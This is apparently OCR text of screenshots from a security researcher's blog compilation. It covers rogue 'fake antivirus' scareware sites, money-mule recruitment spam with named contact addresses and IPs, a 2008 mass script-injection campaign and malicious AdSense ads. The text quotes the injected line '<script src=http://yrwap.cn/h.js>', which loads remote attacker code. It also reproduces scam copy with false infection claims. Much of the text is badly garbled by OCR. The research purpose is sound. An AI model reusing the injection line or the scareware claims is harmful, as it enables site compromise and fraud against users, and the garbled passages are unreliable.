Tha whale process tubes leas thar 
‘Stes and a FREE of al charge 
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ADWARE PROFESSIONAL 2010 


10k Poe Techrcicgy 


Hieene Page FAQs Dewnload About 


AicAfeoe’ 
SECURE 
we Ta 


Make Your PC Run Like New! 


Try our FREE Scan to see if your PC is Infected 


“Anti-Spyware Made Simple!” 


* Removes and Blocks Spyware, Adware, Viretes, and Trojans. 

© Kills Beowser Hijackers, Keyloggers, Dialers, Bots and other Qeeats. 
© lenercepts and Destroys All Foems of Uewanted Pep Ups. 

® Frequent software updates provide optimal PC presection. 

* Ula Easy to Use . 1 Click of the Mouse Fixes your Computer. 

* Free, Ustinined Live 24/7 Customer Support. 


Top Rated Spyware Protection 
Adware Professional has been downloaded over 47 Milion times by people in 
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. mAVEA ae = 
LIVECHAT 


Speak to a reat perveed 


a=. 
mn Me ree 


72% of all spyware is not detected by the major Antivirus programs. Onty a 
purposely bul spyware removal tool such as Antivirus + can’ 


© Antivirus + features: 


© Spyware removal . detects and removes spyware programs and 
trojan horses instatied on your PC 
© Homepage Monitor Tool - browser Hijackers, belonging to the family of 
spyware and adware, are capatle of taking control over your 
homepage and other tavonte pages, and set an unknown website os 
your homepage 
‘System clean-up - clirmnates the Traces of your systern activites 
Disc clean-up - securely destroys all the Gata on your old hard disc 
Quarantire - The intected files that cannot be fixed of deleted are 
mowed to a Quarantine folder and displayed on the Quarantine pane 
of Arnivirus. 
© User-friendly Wizard Mode . the Quick Scan Wizard will help you run 
8 san m the basic scan modes 
© Autorun Tool - if you want to know whet apslications run autornatcally 
on your system after Windows boots, 
© Open Ports Tool - without a protective apphoaton, your system ts 
Tr 
Totat ads: 991590 ‘ aimee ht oleate irate terence le: to Trojan programe 


Last update Thursday, Apel 16, 2008 
Total virus records 728674 tees 


© dowWNUAAD oo — fe Eaters oy Omer 4 


<V TRUE LIFE STORIES: © Is my PC infected with SpyWare? 


© Steve J of New York had hes software projec hat esr carb trand mar 


stolen ryan toyan —— career ooror Q: Your PC is naming 
’ ad @ You are pestered by those horrible popup ads? 


trom a strong depression — O Your homepage beeps changing ? 

© Jason W was tred because he has been visiting OC: New ors appear om your desktop? 
sorne proftited wvernet sites forn an office QO: Do you get toofmars in your browser that you dont want? 
cornputer Mis boss opened the web browser's © Do you dewntoad any must files torn the Hriernet? 
history and saw all the tes Jason has been rb isebmerpaie ernynceeanninase vedo ngpepanse 
visting Jason is stil unemployed. preceid tap hod tpertendyebts tay prartonts tk ape cast tele 
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2009 Best AntiMalware/ Adware removal 
efficiency. 


The most efficient software for 


10! 


al and further protection of your PC 


90,3% 


enc 


EF Fic 


Virus — Kaspersky ——- F-Secure ESET Webroot BitDefender Norton 
Shield Anti-Virus Anti-Virus Nod32 Antivirus = Antivirus Antivirus 
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Wheat Is Antivirus Agent Pro? 

You are tired of searching for the best and most secure antivirus an the met? 
Your searches have ended up Antivirus Agent Pro és the most up date 
and high quality security software you Gen trust in today’s plentiful word of 


supply and demand What we offer you alows forgetting entirely about ail Virus Win32 Gomdesk 
Rinds of; 

Email Worm. Win32 Warmoy nf 
© Adnare, spyrmes, beytoggers Email-Worm. Win 32 Wareaoy. rot 


- o Ereail-Worm Win32 Werreoy. ine 
eaten, nee es Emait-Worm Win32Zhetatin 


© Sxiden crass, Cecrenwd performance © Untest 
Trojan-Dowe ander 15 Srrait fi 
Trojan-PoW.Win32. OnLineGomes.om 
Trojan-PSW Win32 OnLeneGames. tf 
Trojan-Downloader_Win32_Agent.nmi 
Trojan-Doweloncer Win3 2 Braid upetane.¢ 


© Sow internet connection, annoying popups 


In this progressive workd promising the fastest performance in aimost all spheres, especially in the em of Informetonal 

Technologies 8 men deserves be provided wth the quick and test customer servees and most up to det and hgh ~ 

Quality products. Quality stands a3 premium factr for the consumer who strives to find the procuxts best meeting ther ~=Tastimonials 

Gemands. How successful the choir is depends on many factors. © “mm ‘Agent Pro tok has rae 


semethatte difference im oth speed and 

hn the the ants, ume bine ant 

Qaneraé the Migher are more possiblity @ fealty high quality and professional products. pees ue 
What can you expect from Antivirus Agent Pro? Alex, Boston, USA 

For the people who uses PC Spyware represents 4 ginter! problem cstagory, fis is security issue whech bet you thetk of being 

provided welt spam scripts flooding your AC wath ad popups. © “Tdid @ trent scan to understand the impact viruses 


fred on sey pe. Cova very amend to fines cust heat 
Antivirus Agent Pro will help you protect your PC from importunate emails which may tke into possession your personal tesades 8 viruses the softeere also found spywares, 
informagon such as passwords, login details and credit ard information. odwares and trojans and keyloggers ” 


PC users should be first of all sure that the virtual spmoe they use and they are in most part of the day is sncurety protected Arnold, Hastings, UK 
Thos ard WLUSES May Crush your sysier amd make your "User" life a rent meghanare 
© “in bess than fie minutes my computer was cean 
No more viruses, spyresces, acwares, tropen's, 
efoggers. I aan onty recommend Antivirus Agent 
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Malware Destructor 2009 
Powerful and efficient internet antivirus suite 
© Protection against virus threats a 
o Intelligent protectin seas teeta ed salen I 
© Protection for ICQ and IM clients 
@ Low CPU load 


Download Now Y 


Internet Threats Free Online Scanner Features 


youl see the advantages of + Fest amomaned vodetes 


: softer 
= 7 7 « Rewi-tme rotecton agarst searty Pvests when veng 


Alert Level Mediam KQ and Mt dens 
Protect your PC Now Set-crotecton fom beng modified, stoped & even 
rerstaled by rete sookaton 
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Bor, 
MalwareRemoval! © Home © Remove Win PC Deterter © FAQs © Support QOOwNLOAD NOW 


yati ay 


ov | Click Scan & MalwareRemoval 
v¥ Quick Scan Technology 
v 100% Safe and Secure 


Advanced features: 


Reot-Level Removal of WinPC 


| Scan, Remove & Prevent = | Why Malware Removal Bot? 


~ Detender 
= . Powerful Smart-Scan 
ee ov alts OF ompletety Removes 
Malware Remov ait} o mene : LO ~ eur 
leare 100% of Matware from Completely Deletes Malware, 
" your Hard Orive & Registry ~ Adware & Spyware 
CO Intuitive Siege Click ont ots 
Omabies Harmful Programe 
© Built in Backup and Restore 
a ts System Slowdown Boosts System Speed & 
~ Performarce 
rn Stops Matcious Programs from 
heaetieleacntl ~ Runesing on Startup 
Includes: 
~ Delete WinPCDefender and Remove Malware AERA 
7 Get protection from the latest online tireat The scammers behind Win PC Defender will stop at Free 24/7 Technical Support 
Aa nothing when ft comes to tricking you. What's worse & that rogue programs Ske this often dom’ travel 
a = alone, but instead are ferried by clandestine Trojans, agents that pull Spyware and Adware on your Minimum Requirements: 
e.3 system. There's no doutt Gut the work! of malicious software has grown complicated and powerful But sOOMMz 
hoi @unkfully. MateareRemovalB OT proves you with a way te combat the most serious dangers. ee 


Windows 08, ME, XP, 2000 - 
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"Advertising agency “Brand Image” helps its clients to perform their products and ser- 
vices the right way. We never offer you anything additional that we didn’t discuss at the 
beginning. The motto of our work is honesty and we believe that this is a very important thing 
in advertising. 


We were created to help you in selling products and services. “Brand Image” typically 
attempts to assist you in building your brand by persuading potential customers to purchase 
or to consume more of your brand of product or service. It is vivid from the name of our agency 
that we are doing a lot for your brand. Actually we are constantly working at brand manage- 
ment. It is known that the value of the brand is determined by the amount of profit it generates 
for the manufacturer. Advertising agency “Brand Image” clearly understands the main prin- 
ciples of brand name and will be glad to help you in choosing the right name for your company. 


Advertising agency “Brand Image” proudly presents a great variety of services it provides. 
The main advantage of our work is that our management staff is always on-line and works 
24/7 for your convenience. Moreover, our offices are located all over the Europe and in the 
USA that makes our work fast and comprehensive. First of all let us introduce you what exactly 
we offer our clients. However if you happen to have any questions in understanding what this 
or that service means, you can always find our contacts and use them in communicating with 
us concerning our advertising offers." 


Sample [26]spam message localized in Italian used to recruit for Brand Image Advertis- 
ing Agency: 

"Salary: 4,000 Euro; 10 % di ciascuna operazione di pagamento - conto personale 10 %; 15 % 
di ciascuna operazione di pagamento - conto corporativo 15 %; Location: Italy Accettazione 
dei pagamenti dai clienti nella vostra zona ? Accepting payments from customers in your 
area? favorire a realizzare gli obiettivi finanziarie di Compagnia.Le condizioni di lavoro. Il 
lavoro tranne internet - ufficio, e anche con le banche ei sistemi di trasferimenti veloci. Gli 
interessati ambosessi possono inviare CV con consenso al trattamento dei dati personali 
(art.13, d.lgs 196/03) e requisiti di contatto al e-mail. Se a Voi interessa questo lavoro, 
mandate i! curriculum alla nostra: judicialHathawayv?@gmail.com Cordialmente, Sincerely, 
David De Simone David De Simone" 
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#8 Cleaner2009 


You are Not Safe! 


What evidence does your computer have? 


Prwvate comparees are Yactang Me ISPs to record pour Internet Detunice and 
Orwnioass toe eidence Se 3 Mes does not get nd of Ne evidence 
Many Bes you are Mot even aware Cf ihe Mes Dial Det mstatied by Memsenes and 
COMO ORT POU Career, YOU Mamtage CF yOu Overa® Stztus QUO 


© This is HOW COMPROMISING FILES GET STORED IN YOUR COMPUTER! 


Stew Mes are 
dt your hard 


es lexee tracks of 
ne beh wna is Nat enough 
TET OTTER® your 
A cand inform amon of he evsenc: 


yet 


perrression 


Scans and removes Internet (ecu ds, lemon ary 
Ges and waciews Gate for you PC 


Prevents you fom beng seed of Caught wth 
nagpropnate fies hm your computer 


(3 (« 
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RapidAntivirus Syrnyes tin etensh tees : 
infected With spyware CAN 


} 


Protect Your Computer Now! 
Secure Yourself Against Fatal Viruses And Worms! 


Removes Spyware 
* Removes Adware 
Clears Cookies 
Blocks Phishing 
Attacks 
Kills Browser Hijackers 
* Free Customers 


Recommended: 


Support 


Basic symptoms of spyware infection What is spyware? 

“If the answer to one of these questions is "Yes", then you are Spyware, like a virus, is a malicious software planted on your PC by a 
probably infected. third party in order to secretly monitor your online activity. Once your 
- Your computer has slowed down browsing habits are analyzed, you are flooded with endless 

- Your Internet connection speed has decreased Commerdals, Popups and Spam from inside your PC! Spyware also 
- You hawe downloaded music or software from the Web dramatically slows down your computer and Internet connection speeds. 
- You get popups and annoying ads when you're online or Spyware collects your private information and steals your identity, 
sometines even offiine passwords, credit card details and other financial data. 

- Your default home page has been changed to the one you 

Gidn't ask for 

- You have an extra toolbar installed, and you dont know 

where it came from 


- You receive more spam emails than ever 


Privacy Policy | Terms Of Use! Legal! Refund Policy 
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‘Sartch to XP Antrirus and eryoy your system being tree of viruses, 
Spywere, adware, and Other socurtty treats m pst a second 


Smart Antivirus 2009 


TRY IT FREE 


Not saasfed with pour current = 
© Sictencnael nmaner @ ove wns rome ortce @ Smet ons tacnen Brscess GQ towornes @ tecrecwy kenny 


Latest vius alerts 
ian ea How can Smart Antivirus 2009 help you? 
W32 Backtecr | 

Worm Crernety® a 

W232 PeOoteter £2 5 
Worm Trayae OtficeVorm & 


Seman antvtrus 2009 6 Dre Noghest level of protection against ihe Preats of 
ruses and spyware has been designed to keep your PC secure Smart 
Anteires 2009 quarartess The teghest level of protecbon tor your systennt 


Vituses and madcous prograrns ineditabty Wad to System Meenes. crashes 
39d 63 Howsoans Smart Arfvrus 2009 technology safeguards you hom af 
MICRO; INOW ANG firw VrUSES ANS MabOous programs & ofers tote reat 
See protecton for your PC 


Use Sman Antvirus 2009 to optimize and repae your PC 


Try Smart Antivirus 2009 now! 
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The Most Dusted AsO Spyware Avetiatie! 


~S? ~—Ss are YOU sare? 


OVER 90° OF ALL PCS ARE INFECTED WITH SPYWARE! 


Scan and Remove Harel Atmore and Sprpmoret 


fo PROTECT YOUR PRIVACY “ys SCANS FOR ALL SPYWARE [[® bg TAKE ACTION NOW! 
mY SECURE YOUR PC! OUT THERE TODAY! < SC. PC FOR FREE! 
Your PC is probably Infected f you Scam your PC's Processes, Memory and Dont ket Soyware and adeare rrade 
Comnbond Music Online. Protect your ‘System Regestry for hedder and dormant your Preacy! Try Spyware Remover 
Privacy, Stop Identity Theft, Popup Ads Soyewe, Adware, Hows, Casiers, for FREE today and see tor yoursel # 
and Privacy Inwesiony (oortes ard other formes of Mabware! your computer is rfecte? 
BLOCKS AND BLOCKS worms BLOCKS ANNOYING 
REMOVES VIRUSES! AND TROJANS! 9 POP-UP ADS! 
Protect Yourseltt - fnee PC Scand _ FREE Download wale {nowt 
NN Home | FAG | Tertimormats | REE Download | Support | Attiintes y 


ereeacy 
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Spyware G Guard 2009 


s here 


Help Contact: 


@) What is Spyware: 


Spyware ts computer sofware Dat ts incstated 
SuTepthously on a personal computer to intercept or 
take parhal Comal Over he users interacton wih Ne 
Computer. without the users informed consert 
Nowadays Spyware 's externdy Narre ars realy 


dangerous: 


a9 Basic functions: 


&@ PerfeciFit hewistic technology, automaticaly detecting 
all the spyware, malware and viruses on your PC and 
Geleting it 


Unique user irterface. providing you with all basic 
functions froen a single tab: pretty and smarty 


SmartScan technology, giving you ability to scan efther 
the whole drive or common foklers 


Adiabonal mode for spyware Getecton, protecting your 
PC even when active protection is turned off 


instant virus ard spyware signature update and support 
via website or E-mail 


Home | Download | Help | Contacts 
x ¥ 
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Syvtem Tesks System scan progress 
[a View system mformenon eet = 
ot 
Zi) Add or remove programs = greeted 
o 2 © 101 trojens 
: = Hard droves 


Other Pisces File Download - Security Warning 


© My Network Places 
0) My Oocuments ovo 
© Swed documents 
o Comtral Panel 


oO 


Type Application, 1668 
From 


De you want to run of nave thir file? 


Name etalS5D0_2007.ex0 


®) What is Spyware Guard: 


Spyware Guard 2009 ts 2 bghtweight tool providing your 
PC's uBmate satety in ome single Cikk Residental scanner 
easily Scans eter complete PC ce needed folders and 
TEMOVES UTWaeD EDYWware. Malware and even viruses 
One of he strongest sotuton in Ne naustty, Spyware Guard 
res you best to protect your data - now and today’ 


Run FREE spyware scan 


To remove al the spyware from your PC 
you can run easy, safe and absotfely 
free spyware scan 


You't be redirected to Gowrload page. where 
you can get special edition of Spyware Guard 
which functionalty is trnited to scanning 


if you need instant and actve protection, purchase 
Spyware Guard 2009 for $49.95 (single boense) 


N“ 


Legal | Privacy Policy | Refund Policy | Terns of Servce 


Windows Security Alert 


I To help protect yo 


© Admess Trojan 
D eservy. Transponder, Trojan 
OD Wistert. tropenDowntoader 


Fon | [Seve | (_ Coreel 


‘While fee fom the internet can be utebul, the: file hoe can 
(potentially hare you Computer I pou do not Wut the novece. do nat 
Whats he mh? 


oun ce saree Bre coftnare 
Threats anc actors: 
hare Cate ter rAectet State - 
@ teat wormwmtnnet — Crtkal 1.2008 s Wang renova 
@ test wormwmtzityd = Crtkal 11. mh. 2008 % Wergrercnae 
@ we s2008-xQ Crtcal 11th 208 s Nergrerne - 


personal 


Advice: 
You need to remowe tus Great as soon as possbie! 


fom you computer 
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‘Ths crogram 6 potentaly Gangerous for pow system. Tropa Downloader stealing paspeords, edt cards and other 


computer, Windows Web Security bas 
detected trojans and ready to remove thee 


Cetected spyreare and admwe on pas comenter 


Flere 


16 software, which can gather eformation trom user's computer through 
connection and send thom to ks creator. Gathered information can be 
onde, e-mail ecdrenves and all that dete, which i important for you. 
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| Ade ilt screenshots found on your PC Last adult URLs visited 


% http://porn-youtube- 


8.convhardcore/1/1/1a4f28/0/0/ Teens 


Adult content traces found on your PC, your online activity is exposed to anyone. 


Download scanner to wipe these traces and keep your PC clean. 


Total infected files:[1] Main progress:(37%] 


C:Windows/system32/wbdbase.sve 
Infected level Found Viruses 
Criticat | Name Type Threath level 
Danger 8 SillyDl Spyware HIGH 
High 


Medium 


Low! 


Recommended: Click the "Erase infected” button to erase all spyware and viruses from Windows | Erase infected 
| } 


[37] 


26588 


Antivirus Your safe web-surfing solution 


E REALIABLE p GENIUNE : 


Bivrot 


E EFFECTIVE 
PROACTIVE 


2! Antivirus Buy and download 


ourt products 


forfreenow % 


ord bejan stad comagemore = Antivirus V.I.P key features 


milion of computers at the fest © Fd Wedows IP Service Pack 3 Seautty Center Sopot! 
hows after et ot ord corset T . 

A wesw © Rescvescan Tecnology - Wi Ultra tah speed scan rescueng you's PC from viruses for 
Corrected miter a it of monte, fen secords! 


© Ulpmate Live Update - Each 2 hous anti-virus bases and modes are completely undated. 
AVES V.LP stands serine Over wa Drwacy and enety! 


© Artveus V.LP finds out and removes more than 300000 Trojan horses, Soynare, Viruses, 
© Actvews V.LP allows scan fles qacty and access otter featres Anturus 19 drecty 

fom Widows Explorer; 

Removes “actue began” fom o dik ever # itm blocking the fe: 

Removes Pojan fies are locked for writing (for example. DLLs beng used); 

Gent backdoor and worm protector; 

Supports compresses Mes scan; 

Reports and Actuity Log furctonaitty; 

Wrus Removal Agsstant can force dean the sh.ttern tojars and spyware fun the other 
removal tools cannot; 

© The Sehaver Anaiyss Techrotogy can find cut the urinown Pojans and spyware better; 


. 
. 
. 
. 
. 
. 


© The scheckied scan supports automatic scan at specitied time; 
© Lowest CPU usage rate, best performance and modern user Gt. 
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Virus Response 


Lab 2009 


Protect Yourself 


Soo Soyware and Span from 
infecting your PC 


DOWNLOA 


FREE SCAN 


A vecupdates 


‘The Uve Update feature allows 
you to keep ViusResponse Lab 
2099 up-to-date to the Brest 
mown Soywrare threats, 


Sgr tee 
A Ne onets satet 


According to the National Cyber 
Seaurty Alance, 9 out of 10 
computers with an Itemnet 
conmection are infected wth 
spyware, without mowledge or 
aoerowal Commrercal websites, 
“free” sefmmare and marketing 
Compares are massively 
Gaututng dangerous Soyware 
that put you at ra. Find out 
ight now wth our 


yware in 


MactiewsWorkd: “Soyware © 
evolving Pho a monster that might 
so0n become more vicous than e- 
mrad span and wrut attacks 
combined.” 


TheRegister: “73,000 Troan horse 
61,000 sytem montorng prograts 
and 2.3 mihon adware programs ma 
xan of only 420,000 PCs...” 


Spyware and Soa are the work's leading threats to your Computer's securty today. Aer just Ave 
motes surfing only a few pages on the Piemet, you Tey have knowingly Gownloaded more 
than 10 spyware applications thet and expt your computer. Sending and recewing eral 
males your Cormouter just as vulnerable to annoying and mahcous swam, 


Sxans your entre system for efectors using our 
exclave teat Catabase that gets updated every 
single hour. Scanning 6 an cary 3-steD process by the 
n6 of which your system wil be Clean of Al spyware 
angers. 


Brand-new reabtime montor for any kind of spyware 
Oe adware attacks attempted on your machine. After 
You Gean your system, © Spywal wi keep 
crvatching your back. You'l never have to worry 
abot spyware agan 


Ths reabtrre fReeng program montors and blocks af 
incoming spam lueeping your Inbox clean of annoying 
(and sometimes dangerous) messages. 


Berg atoratcaly Piegrated mto your browser, & 
wi rake you forpet adout comrnercal pop-.0s sooner 
than you can rragne! 


Sprwall J 
ine 
Monitoring 


What is Spyware ? 


Spyware (¢.9. vrus) 6 makkious software planted on your PC by a thed party in onder to secretly 
onter what you do onine. Once your browsing hats are analyzed, you are fooded wth endiess 
Commercials, Pop-wos and Span from rate your PO Soyware dramatically slows Goen your 
computer and Inmemet connection speed! 


Spyware collects your pevate nforraton and seals your Certty, pasrevords, crect card detals and 
other fnancet data? 


2 Tp learn more about VrusResponse Lab 2009 cick bere, 
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VIRUS SHIELD 


Virus Shield 2009 


Powerful and efficient internet antivirus suite 


© Protection against virus threats 

© Intelligent protection against spyware and malware | 
© Protection for ICQ and IM clients 

© Low CPU load 


Alert Level: Medium wa ) Scan your PC 
Protect your PC Now " fast and FREE, 


2009 Best AntiMalware/Adware removal efficiency. 


a 
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Language English o 


~ Fast sutometed updetes 

~ Resi-Ome protection against msicious and suspecious 
software 

+ Advanced protection against spyamre and adware. 

~ ResHime protacton against securtty treats when using 
1CQand &M cients 

~ Self -protection from teers modified, stopped or ewer 
urenstilied by another application 

~ Low CPU load 

~ Compatible with Windows XP, Windows Viste 

> Free support 24/7 in touch. 


Awards 


26591 


XP. 


THE BEST PROTECTION AGAINST 
MALICIOSS, 


—_ 


“If the annwer to ane of these questions & "Ves", then you are 
probably infected. What © spyware? 


° } cack eve to start tree cant) 


About XP-Sheeld profesuond 


30 dry money back quarantee 
antinyware bt 


Qoerioad 


Do not wait, try now for free! BF 


mtactus termtandcordtiors prvacypoky EULA 
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home 


ENGUSH ITALIANO 


“Perfect Finance Conditions 


sn 
IPC are Provided 


homse | about us | services | careers | contacts | login 


S | Privacy poey 


A second template is known known to have been used, this time offering different commis- 
sion: 

"Rappresentante finanziario Informazioni di posti di lavoro Post Date: 12/04/2009 Salario: 
3.000 EUR/mese + 5 % di Ciascuna operazione di bonifico Location: Italia Generale Description 
Accettazione dei pagamenti dai clienti nella vostra zona e favorire a realizzare gli obiettivi fi- 
nanziarie di Compagnia. Le condizioni di lavoro II lavoro tranne internet - ufficio, e anche con le 
banche e i sistemi di trasferimenti veloci. Contact Details / Apply for this Job Se a Voi interessa 
questo lavoro, mandate i! curriculum alla nostra individualpeoplecapitalgroup7@googlemail- 
.com individualpeople .biz/go.php?sid=7 In attesa di Vostro riscontro, saluti manager HR 
Robert J. Wilson" 


What we've got here is an identical soam template using a template offered by a man- 
aged money mule recruitent design vendor, that is advertising another bogus brand, with the 
domain name itself registered using the same detaisl as Brand Image Advertising Agency (inter- 
nationalbrandimage .com - 91.213.72.142 - Email: Sergey Stepanov; userovsky@gmail.com). 
In the case of the localized to Italian spam message that’s yet another bogus brand Individual 
People Capital Group, individualpeople .org - 91.213.72.142 - Email: Sergey Stepanov; 
userovsky@gmail.com. 


Individual People Capital Group describes itself as: 
"The Individual People Capital Group Companies is one of the world’s most experienced and 
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@ ADVANCED ANTIVIRUS 


bd se e at e 
Basic signs of Spyware infection cuter and internet commect 
“i! the answer to one of these quesfons is “Yes”, then you are probatty infected. prware collect , 


WAPVista 
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Nard Orives and Shared files 


Items processed & «> “> 
2 Local Ovsc (C) pe Local Dise (5) Shared Documents 
v Viruses found: 3 


@ vo errors @ ro errors © security noesmal 


Virus status 
Process: Safe Files scan 
GE} Mnidate security svsters BESUSSEESoSeeSoeeSeeeeseeeassos 


> rove malware protect on 


Systeew information PP viusdetecton: 


1P 208.83 222.38 Type 
Location: United States 

OS: Linux 

Browser: Morilla 


Security status: Processing... 


Attention! 
» itis recomreended that you install full real-time antiwirus protection against external attack for safe browsing. 
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AntivirusBEST ™ 


Spyware aiso dramatically slows down 
your computer and internet connection 
speeds 

Spyware collects your private 
information and steals your identity, 
pasewords, creas card details and other 


Basic signs of Spyware infection 

@ the anawer to one of ese questions is “Yes”, then you are probably infected 

1. Your computer has sowed down 

2. Your Internet connecton speed has deceased 

3 You have downloaded music or software trom the Web 

4. You get popups and annoying ads when you're online or sometimes even affine 
5 Your detautt hame page has been chanped to the one you didn't ask tor 

6 You heve an extra toolnar instatied, and you dan! know where it came from 

7 You fecerve more sparn eenaiis than ever 


CHECK YOUR PC NOW 
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Geniune 


MOVES SOM eer 


MORE REALIABLE 
MORE EFFECTIVE 
MORE PROACTIVE 


4 Win Pace Gen 


Stanstcs acorove Tat vrus Asthewus XP 2008 key features ‘S Wind2jadwareSearchad 
and bojan attacks damage more 
fan Binonhay 6 te rex Dh yp 6. Wen d2/Tecbar Mymabsearch 
‘wrus appears each hour. One © Rescues Tecnology - With) Utrera) speed scan rescueng paws PC for Viruses fr few ae 
em, wrus Sasser. A, nvfected cuatieteaamaa 
mmiion of computers at the frst secords! 8 Wan2Qhont 
hours after let out and caved t > moduies we Comoietey VOdated 
Ithed been © Uenate Uve Update - Each 2 hows ant-vous beses and - 9. Zi TreparOowrtoader. Wimad.N 
Corrected matte 8 et of months Antes IP 2008 stands sentinel over yaw privacy ard ierety! 


10. Win 32Jagert 

© Anberus IP 2008 finds out and removes more Pan 930000 Trojan horses, Soyware, Veuses, 
Hackers, Adware, Keyloggers and areter Narenare: 

© Anterus IP 2008 allows scan fies quckly and sccess other feanres Antvius XP 2008 Grecty 
from Windows Explorer) 

© Removes "active Pope” for 2 dak even if tis Diocting fe Me; 

© Removes roe thes are locked fr ertng (fw exanoie. OUs bere usted: 

© Best backdoor and worm protector: 

© Supports compressed fies scare 

© Reports and Aciuty Log Aunctoraity; 

© Wrus Removal Assetent can force Gean te sober Pojans and spyware fan Te other 
removal tools corret, 

© The Behavir Anaipss Tecnology can fre out the uireen Popes and spyware Deter) 

© The schedded scan suppers automank scan at speotied tre; 

© Lowest CPU usage rate, best performance and modern user Gul 
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oe, Antivirus 2008 Installer 


a= Antivirus 2008 


ANTIVIRUS mE = Welcome to installer! 


This program will download and install 


Antivirus 2008 on your PC. 
N am By clicking continue button you are accepting 
our Terms and Conditions. 


Stay tuned! 


1 
2. 
3 
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ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEgLqOwEgMjedIEkcyNF4YyWJpLNMXVkZuoYuyE9hjRk_R_Oa 
= QHLopSLuCVuo- 
. https://blogger. googleusercontent .com/img/b/R29vVZ2x1/AVvXsEhoWEew2mHiom- 4Ch8b5fLyOy2YdA0-dm5zYr1Rfu1ilxYSR 
uji_lgJxRAH2WcEB6yCtiyuQKxoNKb3hhSFZ968Xs9-K39f409Br 
ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjVAgyaSe jn6BpAbSPaGcnTczdm6ni3Y5q1duAmRMOZSRO3M 
oE7LZDs6xw6tb68W1Uitx32I_3ztUic-k5nf0ax0Qy4wi47a4s-Cj 
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19.2.10 A Peek Inside the Internet Explorer Zero Day Exploits Serving Cam- 
paign Affecting Thousands of Legitimate Sites Circa 2008 - An Analysis 
(2023-02-06 23:11) 
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BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihJjs ... 

This site may harm your computer. 

16 Sep 2008 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script 
src=http:// yrwap.cn/h.js> Photo #2 - (0 comments) ... 

www. beanonline. org/photos. asp?id=295 - Similar 


JAQES - 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnih js ... 
This site may harm your computer. 

<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http:// 
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ... 


www. beanonline. org/photos. asp?id=243 - S 
More results from www. beanonline.org » 


imilar pages - 


Decentxposure :: ThursdayEnvy Split<script src=http://yrwap.cnhh ... 
Temporary Residence Records — 11/12/2008. | almost forgot to mention this at all , and that 
would be a pure tragedy. Thursday is back, and dare | say better... 


Online Branding Report<script src=http://yrwap.cnihjs></script ... 

This site may harm your computer. 

Creating a fabulous, unique product along with a companion, sharp-dressed VV¥eb site doesnt 
guarantee success. VVhat good are a product and a site ifno one... 

internetviz.e-seminars. bizVVebinar/Booklnformation. asp?ID=7 &source=nslr - 


Similar pages - 


leaf<script src=http:-//yrwap.cnihjs=</script=Products Indianleaf ... 

This site may harm your computer. 

leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters 
Buyer. 

my.expomarkets. com/catalog-manager/productlist.asp?sscatid=507 - 


Similar pages - 


ST 1<script src=http://yrwap.cnih.js=</script=<script src=hittp ... 

Satellite TY charts all over the world from Asia, Europe, Atlantic and America. Daily updated 
satellite information. 

www.tracksat.com/satellite.asp?satelliteid=154 - 204k - Cached - Similar pages - 


Takes you back doesn’t it? What used to be a daily reality back in 2008 namely the use of 
iFrame injected scripts on major Web properties basically forwarding the redirecting 
legitimate traffic to client-side exploits serving web malware exploitation kits is still a valid 
practice in today’s modern and sophisticated cybercrime ecosystem. 


Stay tuned! 
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19.2.11 A Peek Inside a Google AdSense Rogue and Bogus Advertisement Campaign 


Impersonating Legitimate Software - An Analysis (2023-02-06 23:11) 
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Google  anisiscesin (Zenian) acess 


Doorzoek: © het internes O pagina’s in het Nederiangs O pagna’s uit Nederland 


Het internet Resultaten 1 - 10 van cca 1,150,000 voor download winamp tree 
Download Winamp Media Player 5.541 - Download Wi Media Player ... - [ Vertaal deze pagina } Gesponsorde bk 
Download Winamp. The #1 Free Media Player ees AAC, MPEG, AVI files. and 
more. Get free MP3 songs. veseos, pcg Lo tana 
ww winaenp con/player - 56k - in cac dige pagna’s hhouwe on laatste versie 2009 
Exciuseve gegarandeerde download 
amp NM P ~MP.: + | Vertaal deze pags J winamp.winamp-co com 


esse Gows Winamp Uses 50 Fre tunic Downloads +1 ewe Aboot 7—— 
Winamp. ee Ploy you WPS AAC, MPEG, AV! fies. .. 


eng: ere Ok - + Golukenardioe paginas Neuwste Mp3 Muziek Downloads 
2 ~<§ : Snel, Veilig & 100% Legaal 
Muziek downloadboxx com/Mp3 
Grats Sofware Site ni. Mediaspeiers > Winamp Free 
Alles wat u welt weten over Winamp Free! ... Download Winamp Free ... Download Winamp Muziek GRATIS Downloaden 
Download Winamp Lite (alleen voor peregrine i Simpel, Makkelyk en Snel 
wow gratissofwaresite olwinamp. him! - 21k - in cache « Golskwaardige paging’s al je Favonete Muziek Downloaden 


www GrateMunekDownloaden netimp3 
Winamp Media Player - MP3-speler, Mutimediaspeler, MP3-muziek ... 


As I've recently came across several mainstream news articles on the use of Google AdSense 
to serve malware I’ve decided to share several screenshots circa 2008 which basically 
demonstrate the process. 


Sample screenshots include: 


[2] 
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Stay tuned! 


bittorrent-co.com 


222, theplanet.com 
3-222 .theplanet.com 
wtheplanet.com 
.theplanet.com 
.theplanet.com 


theplanet.com 


2 
222, theplanet.com 
2 


3-222, theplanet.com 
2. theplanet.com 


theplanet.com 
-222 theplanet.com 
73-222. theplanet 


22, theplanet.co 
wtheplanet.com 
theplanet.com 
22 theplanet.com 
2, theplanet.com 


.theplanet.com 


2m 
Iphant-c 
amule-co.c 
limev 
¥U 


adobe-reader-co.com 


flash-player-co.com 
paint-shop-pro,com 
winrar-co,.com 


ccleaner-co.com 


comp.com 


alarm-co,com 
Ore 
media-player-co.com 
divx-co.com 
office-co.com 
yirtualdj-co,com 
zattoo-co.com 
clonecd-co.com 
tuneéup-co,com 


plorer-co.com 


fe-co,com 


download-acelerator.com 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgS1AA6CUWytO2TQqEqUAmFnN6NUgLTFcQcQhwm7 eP3xdBpw 
RRb7w9nSgPf2s_9Lp5bi0QN1-_nkHEWOX30M9M- 2kcmJ43Su98gab2 
2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvVXsEja2GCcZz3q0cAzPclaA9KNegf ZbiBmw8_DO10TCSxawbXYp 
